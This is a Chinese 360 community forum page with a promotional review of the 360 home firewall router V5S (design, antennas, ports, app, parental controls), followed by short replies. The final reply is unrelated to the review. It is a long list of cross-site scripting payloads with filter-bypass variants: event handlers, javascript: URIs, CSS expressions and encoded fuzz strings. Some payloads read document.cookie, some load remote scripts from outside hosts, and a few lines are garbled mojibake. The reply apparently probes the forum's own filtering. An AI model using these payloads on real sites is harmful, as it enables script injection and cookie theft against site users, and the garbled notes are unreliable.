请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块活动360粉丝商城众测粉丝轰趴馆常见问题

360家庭防火墙·路由器V5S:带给你的不仅是速度畅快体验,更是网络安全的保障

2019-9-24 17:56 | 复制链接
4 10145
网络安全一直是大家较为关心的重点,特别是随着智能科技的快速发展,越来越多的智能设备都需要接入网络,从而更好的利用强大的网络资源和实现更好的远程联网操控,让生活更加智能便捷。路由器作为联网设备接入的重要端口,其不单单是稳定强大的信号覆盖,更重要的是其要承担起家庭网络安全的门神,从根源上更好的保障网络环境的安全。今天要为大家介绍的便是360最新推出的主打家庭网络安全的360家庭防火墙·路由器V5S,一款时刻守护家庭网络安全的黑科技路由。

360社区

360社区

包装方面,360家庭防火墙·路由器V5S延续了以往时尚简洁的外包装设计风格,包装正面可以看到产品名称,外观简图,APP二维码和游戏防沉迷、上网防欺诈、智能硬件防入侵等主要功能特点。

360社区

360社区
包装背面则是产品的主要功能特点介绍和产品的相关参数信息,整体包装上十分的简洁明了,对于产品的主要功能特点有着很好的了解。

360社区

360社区

360社区

360社区

打开包装,可以看到包装内部采用了硬纸壳对于路由器进行保护固定。包装内除了路由器主机外,还包含有分离底座、电源适配器和说明书,内包装上同样十分的简洁。

360社区

360社区

360社区

360社区

不同于常见的路由器外观设计,360家庭防火墙·路由器V5S采用了立式的外观设计风格,对于居家使用来说更便于摆放,放置在家中也不失为一个很好的摆件,不至于躲在角落吃灰,同时白色时尚素雅的外壳也可以很好地融入不同的家装风格。

360社区

360社区

360社区

360社区

360家庭防火墙·路由器V5S虽然采用了纯色的外壳,但是其在表面还是设计有高光的线条,从而勾勒出淡淡的几何图案。正面的中央为路由器的指示灯,可以通过指示灯的色彩了解路由器的工作状态,直观明了。

360社区

360社区

360社区

360社区

360路由器V5S采用了四天线的设计,2.4G和5G独立配置,网络信号更加稳定,同时信号覆盖范围和穿墙效果表现更加出色,轻松满足大户型的使用需求。

360社区

360社区

360社区

360社区

360社区

360社区

对于长时间工作的路由器来说,散热是不得不关注的一大问题。360家庭防火墙·路由器V5S为了更好地满足产品的散热,其在顶部,底部和背面都设置的大量的散热孔,可以很好地保证机器内部的散热问题,保证产品的长时间稳定运行。

360社区

360社区

路由器背面下方为电源接口,复位孔和三个WAN/LAN自适应接口,三个接口虽然看似较少,但是对于居家使用来说尚可,毕竟多数的产品都采用的无线连接,且360家庭防火墙·路由器V5S无线传出速率表现很出色。另外其WAN/LAN自适应接口在连接使用上更加便捷,随心拔插。

360社区

360社区

360社区

360社区

360家庭防火墙·路由器V5S的底座采用了分离式的设计,安装使用上还是很便捷的。不过其底座仅是单纯的塑料件,并没有放置配重、防滑垫等,建议可以加上,既防滑同时也可以更好的保护器物。

360社区

360社区

作为一款智能路由器产品,智能化的操控必不可少。360家庭防火墙·路由器V5S在外包装便印有产品APP二维码,扫描后便可轻松下载360家庭防火墙APP,轻松完成相关设置。360家庭防火墙APP界面设计上十分的简洁,包含了上网防沉迷,智能产品,家庭圈和路由器设置四大界面,可以很好的实现网络设置和相关的联网设备管理,更好的守护网络环境安全。

360社区

360社区

上网防沉迷界面可以很好地看到孩子及所关注对象的上网状态,从而更好的对孩子的上网习惯作出了解,防止孩子过度沉迷于网络。智能产品中可以对智能产品实现更好的保护,防止智能硬件的恶意入侵,更加有针对性的保护网络安全。而路由器设置界面对于网络的网速,联网设备,上网设置,防火墙等进行设置,让网络安全保护更加的细致。

360社区

360社区
对于路由器来说,智能化的操控和安全防护必不可少,但是其网速,覆盖范围,穿墙表现才是会影响到实际体验的重要方面。360家庭防火墙·路由器V5S提供有孕妇、均衡、穿墙三种信号强度调节,可以很好地满足日常的家居生活使用需求。实际的使用体验和数据测量上,360家庭防火墙·路由器V5S表现都十分令人满意,同时和其它产品相较而言,360家庭防火墙·路由器V5S无论是传输速率,网络覆盖,穿墙能力等方面,总体表现都十分抢眼。
总结
总体来说,360家庭防火墙·路由器V5S无论是在产品的外观设计,还是实际的使用体验方面,其表现都十分令人满意。特别是360家庭防火墙·路由器V5S作为一款家庭防火请安全路由,其对于网络安全保护,家人的上网状态关注等有着更好的针对性,让危险止于家庭网络的源头,时刻守护家庭网络安全,是一款很不错的家庭路由器选择。

共 4 个关于360家庭防火墙·路由器V5S:带给你的不仅是速度畅快体验,更是网络安全的保障的回复 最后回复于 2019-10-9 14:46

评论

直达楼层

hphyzyl LV9.中校 发表于 2019-10-4 06:54 | 显示全部楼层 | 私信
感觉360路由器的型号很多呢
头像被屏蔽
vixenxyy 禁止发言 发表于 2019-10-4 07:44 | 显示全部楼层 | 私信
提示: 作者被禁止或删除 内容自动屏蔽
360fans_u6839006 LV8.少校 发表于 2019-10-4 10:25 | 显示全部楼层 | 私信
支持下
360fans_75556461 LV2.下士 发表于 2019-10-9 14:46 | 显示全部楼层 | 私信
  1. <script>alert("XSS")</script>  
  2. <script>alert(123)</script>
  3. ´úÂë¹ýÂË£º
  4. medium--> ˫дÈƹý£º<sc<script>ript>alert(/xss/)</script>
  5.             ´óСд»ìÏýÈƹý£º<ScRipt>alert(/xss/)</script>
  6. high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë:
  7.         <img src=1 onerror=alert(/xss/)>
  8. <scRscrIPT>prompt(¡®qq¡¯)<Scrscriptipt>
  9. onmouseover=¡¯alert(xss)¡¯
  10. onmouseover=¡¯prompt(qq)¡¯
  11. <script>alert('hello£¬gaga!');</script>
  12. >"'><img src="javascript.:alert('XSS')">
  13. >"'><script>alert('XSS')</script>
  14. <table background='javascript.:alert(([code])'></table>
  15. <object type=text/html data='javascript.:alert(([code]);'></object>
  16. "+alert('XSS')+"
  17. '><script>alert(document.cookie)</script>
  18. ='><script>alert(document.cookie)</script>
  19. <script>alert(document.cookie)</script>
  20. <script>alert(vulnerable)</script>
  21. <script>alert('XSS')</script>
  22. <img src="javascript:alert('XSS')">
  23. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  24. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  25. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  26. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  27. <script>alert('Vulnerable')</script>
  28. a.jsp/<script>alert('Vulnerable')</script>
  29. "><script>alert('Vulnerable')</script>
  30. <IMG SRC="javascript.:alert('XSS');">
  31. <IMG src="/javascript.:alert"('XSS')>
  32. <IMG src="/JaVaScRiPt.:alert"('XSS')>
  33. <IMG src="/JaVaScRiPt.:alert"("XSS")>
  34. <IMG SRC="jav        ascript.:alert('XSS');">
  35. <IMG SRC="jav
  36. ascript.:alert('XSS');">
  37. <IMG SRC="jav
    ascript.:alert('XSS');">
  38. "<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
  39. <IMG SRC=" javascript.:alert('XSS');">
  40. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  41. <BODY BACKGROUND="javascript.:alert('XSS')">
  42. <BODY ONLOAD=alert('XSS')>
  43. <IMG DYNSRC="javascript.:alert('XSS')">
  44. <IMG LOWSRC="javascript.:alert('XSS')">
  45. <BGSOUND SRC="javascript.:alert('XSS');">
  46. <br size="&{alert('XSS')}">
  47. <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
  48. <LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
  49. <IMG SRC='vbscript.:msgbox("XSS")'>
  50. <META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
  51. <IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
  52. <FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
  53. <TABLE BACKGROUND="javascript.:alert('XSS')">
  54. <DIV STYLE="background-image: url(javascript.:alert('XSS'))">
  55. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
  56. <DIV STYLE="width: expression(alert('XSS'));">
  57. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  58. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  59. <STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
  60. <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  61. <STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
  62. <BASE HREF="javascript.:alert('XSS');//">
  63. getURL("javascript.:alert('XSS')")
  64. a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
  65. <XML SRC="javascript.:alert('XSS');">
  66. "> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  67. <SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
  68. <IMG SRC="javascript.:alert('XSS')"
  69. <SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  70. <SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  71. <SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  72. <SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  73. <SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
  74. <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
  75. <script\x20type="text/javascript">javascript:alert(1);</script>
  76. <script\x3Etype="text/javascript">javascript:alert(2);</script>
  77. <script\x0Dtype="text/javascript">javascript:alert(3);</script>
  78. <script\x09type="text/javascript">javascript:alert(4);</script>
  79. <script\x0Ctype="text/javascript">javascript:alert(5);</script>
  80. <script\x2Ftype="text/javascript">javascript:alert(6);</script>
  81. <script\x0Atype="text/javascript">javascript:alert(7);</script>
  82. '`"><\x3Cscript>javascript:alert(8)</script>
  83. '`"><\x00script>javascript:alert(9)</script>
  84. <img src=10 href=10 onerror="javascript:alert(10)"></img>
  85. <audio src=11 href=11 onerror="javascript:alert(11)"></audio>
  86. <video src=12 href=12 onerror="javascript:alert(12)"></video>
  87. <body src=13 href=13 onerror="javascript:alert(13)"></body>
  88. <image src=14 href=14 onerror="javascript:alert(14)"></image>
  89. <object src=15 href=15 onerror="javascript:alert(15)"></object>
  90. <script src=16 href=16 onerror="javascript:alert(16)"></script>
  91. <svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
  92. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
  93. <iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
  94. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
  95. <body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
  96. <frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
  97. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
  98. <html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
  99. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
  100. <svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
  101. <body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
  102. <body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
  103. <body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
  104. <body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
  105. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
  106. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
  107. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
  108. <style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
  109. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
  110. <body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
  111. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
  112. <frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
  113. <applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
  114. <marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
  115. <script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
  116. <html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
  117. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
  118. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
  119. <html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
  120. <marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
  121. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
  122. <frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
  123. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
  124. <svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
  125. <html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
  126. <body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
  127. <body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
  128. <object onError object onError="javascript:javascript:alert(54)"></object onError>
  129. <body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
  130. <html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
  131. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
  132. <body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide>
  133. <svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload>
  134. <applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror>
  135. <body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup>
  136. <body onunload body onunload="javascript:javascript:alert(62)"></body onunload>
  137. <iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
  138. <body onload body onload="javascript:javascript:alert(64)"></body onload>
  139. <html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover>
  140. <object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
  141. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload>
  142. <body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus>
  143. <body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown>
  144. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
  145. <iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
  146. <svg onload svg onload="javascript:javascript:alert(72)"></svg onload>
  147. <html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove>
  148. <body onblur body onblur="javascript:javascript:alert(74)"></body onblur>
  149. \x3Cscript>javascript:alert(75)</script>
  150. '"`><script>/* *\x2Fjavascript:alert(76)// */</script>
  151. <script>javascript:alert(77)</script\x0D
  152. <script>javascript:alert(78)</script\x0A
  153. <script>javascript:alert(79)</script\x0B
  154. <script charset="\x22>javascript:alert(80)</script>
  155. <!--\x3E<img src=xxx:x onerror=javascript:alert(81)> -->
  156. --><!-- ---> <img src=xxx:x onerror=javascript:alert(82)> -->
  157. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(83)> -->
  158. --><!-- --\x284> <img src=xxx:x onerror=javascript:alert(84)> -->
  159. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(85)> -->
  160. `"'><img src='#\x27 onerror=javascript:alert(86)>
  161. <a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
  162. "'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
  163. <a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
  164. <a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
  165. <a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
  166. <a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
  167. <a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
  168. <a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
  169. <a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
  170. <a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
  171. <a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
  172. <a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
  173. <a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
  174. <a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
  175. <a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
  176. <a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
  177. <script>/* *\x2A/javascript:alert(103)// */</script>
  178. <script>/* *\x00/javascript:alert(104)// */</script>
  179. <style></style\x3E<img src="about:blank" onerror=javascript:alert(105)//></style>
  180. <style></style\x0D<img src="about:blank" onerror=javascript:alert(106)//></style>
  181. <style></style\x09<img src="about:blank" onerror=javascript:alert(107)//></style>
  182. <style></style\x20<img src="about:blank" onerror=javascript:alert(108)//></style>
  183. <style></style\x0A<img src="about:blank" onerror=javascript:alert(109)//></style>
  184. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF
  185. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
  186. <script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
  187. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
  188. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
  189. '`"><\x3Cscript>javascript:alert(115)</script>
  190. '`"><\x00script>javascript:alert(116)</script>
  191. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
  192. "'`><\x00img src=xxx:x onerror=javascript:alert(118)>
  193. <script src="data:text/plain\x2Cjavascript:alert(119)"></script>
  194. <script src="data:\xD4\x8F,javascript:alert(120)"></script>
  195. <script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
  196. <script src="data:\xCB\x8F,javascript:alert(122)"></script>
  197. <script\x20type="text/javascript">javascript:alert(123);</script>
  198. <script\x3Etype="text/javascript">javascript:alert(124);</script>
  199. <script\x0Dtype="text/javascript">javascript:alert(125);</script>
  200. <script\x09type="text/javascript">javascript:alert(126);</script>
  201. <script\x0Ctype="text/javascript">javascript:alert(127);</script>
  202. <script\x2Ftype="text/javascript">javascript:alert(128);</script>
  203. <script\x0Atype="text/javascript">javascript:alert(129);</script>
  204. ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
  205. ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
  206. ABC<div style="x:expression\x00(javascript:alert(132)">DEF
  207. ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
  208. ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
  209. ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
  210. ABC<div style="x:\x09expression(javascript:alert(136)">DEF
  211. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
  212. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
  213. ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
  214. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
  215. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
  216. ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
  217. ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
  218. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
  219. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
  220. ABC<div style="x:\x20expression(javascript:alert(146)">DEF
  221. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
  222. ABC<div style="x:\x00expression(javascript:alert(148)">DEF
  223. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
  224. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
  225. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
  226. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
  227. ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
  228. ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
  229. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
  230. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
  231. <a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
  232. <a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
  233. <a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
  234. <a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
  235. <a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
  236. <a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
  237. <a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
  238. <a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
  239. <a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
  240. <a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
  241. <a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
  242. <a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
  243. <a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
  244. <a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
  245. <a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
  246. <a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
  247. <a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
  248. <a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
  249. <a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
  250. <a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
  251. <a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
  252. <a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
  253. <a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
  254. <a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
  255. <a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
  256. <a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
  257. <a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
  258. <a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
  259. <a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
  260. <a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
  261. <a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
  262. <a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
  263. <a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
  264. <a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
  265. <a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
  266. <a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
  267. <a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
  268. <a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
  269. <a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
  270. <a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
  271. <a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
  272. <a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
  273. <a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
  274. <a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
  275. <a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
  276. <a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
  277. <a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
  278. <a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
  279. <a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
  280. <a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
  281. <a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
  282. <a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
  283. <a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
  284. <a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
  285. <a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
  286. <a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
  287. <a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
  288. `"'><img src=xxx:x \x0Aonerror=javascript:alert(214)>
  289. `"'><img src=xxx:x \x22onerror=javascript:alert(215)>
  290. `"'><img src=xxx:x \x0Bonerror=javascript:alert(216)>
  291. `"'><img src=xxx:x \x0Donerror=javascript:alert(217)>
  292. `"'><img src=xxx:x \x2Fonerror=javascript:alert(218)>
  293. `"'><img src=xxx:x \x09onerror=javascript:alert(219)>
  294. `"'><img src=xxx:x \x0Conerror=javascript:alert(220)>
  295. `"'><img src=xxx:x \x00onerror=javascript:alert(221)>
  296. `"'><img src=xxx:x \x27onerror=javascript:alert(222)>
  297. `"'><img src=xxx:x \x20onerror=javascript:alert(223)>
  298. "`'><script>\x3Bjavascript:alert(224)</script>
  299. "`'><script>\x0Djavascript:alert(225)</script>
  300. "`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
  301. "`'><script>\xE2\x80\x8227javascript:alert(227)</script>
  302. "`'><script>\xE2\x80\x84javascript:alert(228)</script>
  303. "`'><script>\xE3\x80\x80javascript:alert(229)</script>
  304. "`'><script>\x09javascript:alert(230)</script>
  305. "`'><script>\xE2\x80\x89javascript:alert(231)</script>
  306. "`'><script>\xE2\x80\x85javascript:alert(232)</script>
  307. "`'><script>\xE2\x80\x88javascript:alert(233)</script>
  308. "`'><script>\x00javascript:alert(234)</script>
  309. "`'><script>\xE2\x80\xA8javascript:alert(235)</script>
  310. "`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
  311. "`'><script>\xE237\x9A\x80javascript:alert(237)</script>
  312. "`'><script>\x0Cjavascript:alert(238)</script>
  313. "`'><script>\x2Bjavascript:alert(239)</script>
  314. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
  315. "`'><script>-javascript:alert(241)</script>
  316. "`'><script>\x0Ajavascript:alert(242)</script>
  317. "`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
  318. "`'><script>\x7Ejavascript:alert(244)</script>
  319. "`'><script>\xE2\x80\x87javascript:alert(245)</script>
  320. "`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
  321. "`'><script>\xE2\x80\xA9javascript:alert(247)</script>
  322. "`'><script>\xC2\x85javascript:alert(248)</script>
  323. "`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
  324. "`'><script>\xE2\x80\x83javascript:alert(250)</script>
  325. "`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
  326. "`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
  327. "`'><script>\xE2\x80\x80javascript:alert(253)</script>
  328. "`'><script>\x2254javascript:alert(254)</script>
  329. "`'><script>\xE2\x80\x82javascript:alert(255)</script>
  330. "`'><script>\xE2\x80\x86javascript:alert(256)</script>
  331. "`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
  332. "`'><script>\x0Bjavascript:alert(258)</script>
  333. "`'><script>\x20javascript:alert(259)</script>
  334. "`'><script>\xC2\xA0javascript:alert(260)</script>
  335. "/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
  336. "/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x />
  337. "/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x />
  338. "/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x />
  339. "/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
  340. "/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
  341. "/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
  342. "/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x />
  343. "/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x />
  344. <script\x2F>javascript:alert(270)</script>
  345. <script\x20>javascript:alert(271)</script>
